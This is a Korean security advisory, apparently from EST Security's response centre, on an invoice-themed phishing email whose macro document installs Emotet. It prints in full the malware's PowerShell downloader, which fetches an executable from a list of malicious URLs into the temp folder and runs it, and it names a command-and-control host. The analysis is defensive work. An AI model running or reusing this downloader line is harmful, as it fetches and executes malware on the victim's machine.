안녕하세요. 이스트시큐리티 시큐리티대응센터(ESRC)입니다.
매크로를 이용한 송장 관련 악성 메일이 국내에 유포되고 있어 주의를 당부 드립니다.
※ 관련글 보기
▶ Trojan.Agent.Emotet 악성코드 분석 보고서
▶ [업데이트][주의] 견적서를 위장한 악성메일 지속적으로 유포중! 사용자들의 주의 필요
▶ 특정 기업의 프로젝트 파일처럼 위장한 악성 메일 유포 주의
이번에 발견된 악성 메일은 ‘INVOICE #00U9404’ 라는 제목으로 메일 본문에는 ‘Please find attached copy of your latest invoice’ 라는 내용으로 첨부된 파일의 실행을 유도합니다.
[그림 1] 수신된 메일
이용자가 첨부 파일 ‘Invoice_no_U9404.doc’를 클릭할 경우 아래와 같이 매크로 실행을 유도 합니다.
[그림 2] 매크로 실행을 유도하는 DOC 파일
만약 이용자가 송장에 대한 자세한 정보를 열람하기 위해 매크로를 실행할 경우,
난독화된 스크립트를 이용해 cmd.exe 프로세스를 실행하고, cmd.exe 프로세스는 powershell.exe 프로세스를 이용해 스크립트를 실행합니다.
[그림 3] 난독화 된 스크립트 실행 트리
스크립트는 공격자가 접속 가능한 C&C 서버를 조회하면서 EMOTET 악성코드 파일을 다운로드 합니다. 분석 시에는 ‘http://vovsigorta.com’ 사이트에 접속 후 %TEMP% 하위 경로에 ‘mjY.exe’라는 이름으로 파일 다운로드 및 실행을 하였습니다.
powershell $IMF='ppH';$lFd='http://vovsigorta.com/JSG351p@http://www.greenboxmedia.center/WJ7Mzdv7@http://ghisep.org/img/jKX2btFw @http://hgfitness.info/DozxE5V2QZ@http://juegosaleo.com/TX9YrE9bp'.Split('@');$fpj=([System.IO.Path]::GetTempPath()+'\mjY.exe');$jZC =New-Object -com 'msxml2.xmlhttp';$pFS = New-Object -com 'adodb.stream';foreach($aXM in $lFd){try{$jZC.open('GET',$aXM,0);$jZC.send();$pFS.open();$pFS.type = 1;$pFS.write($jZC.responseBody);$pFS.savetofile($fpj);Start-Process $fpj;break}catch{}} |
[표 1] 실행되는 스크립트
다운로드 된 악성코드는 사용자로부터 의심을 피하기 위해 ‘C:\Windows\System32\tlntasp.exe’ 경로에 자가 복제를 한 후 사용자 PC 시스템 정보(프로세스 목록, OS버전, 아키텍처)를 수집하고 C&C(millcreek.cc:7080) 서버로 전송합니다.
따라서 출처가 불분명한 메일에 있는 첨부파일 혹은 링크에 대해 접근을 삼가하시고, 검증되지 않은 파일을 실행하기 전에는 백신 프로그램을 이용하여 악성 여부 검사를 수행해주시기 바랍니다.
현재 알약에서는 관련 샘플을 Trojan.Agent.Emotet 으로 진단하고 있습니다.
비너스락커 랜섬웨어 조직, 베리즈 웹쉐어를 통해 갠드크랩 국내 다량 유포 (0) | 2018.11.19 |
---|---|
해외 배송장으로 위장한 국내 포털 피싱 메일 주의!! (0) | 2018.11.19 |
금성121(Geumseong121) 정부기반 APT그룹, '코리안 스워드(Operation Korean Sword) 작전' 수행 중 (0) | 2018.11.16 |
비너스락커 위협조직, 입사지원서로 위장해 갠드크랩 랜섬웨어 한국에 급속 유포 중 (0) | 2018.11.15 |
2018년 11월 Lazarus 그룹 한국과 미국 서버를 이용해 APT 공격 수행 중 (0) | 2018.11.13 |
댓글 영역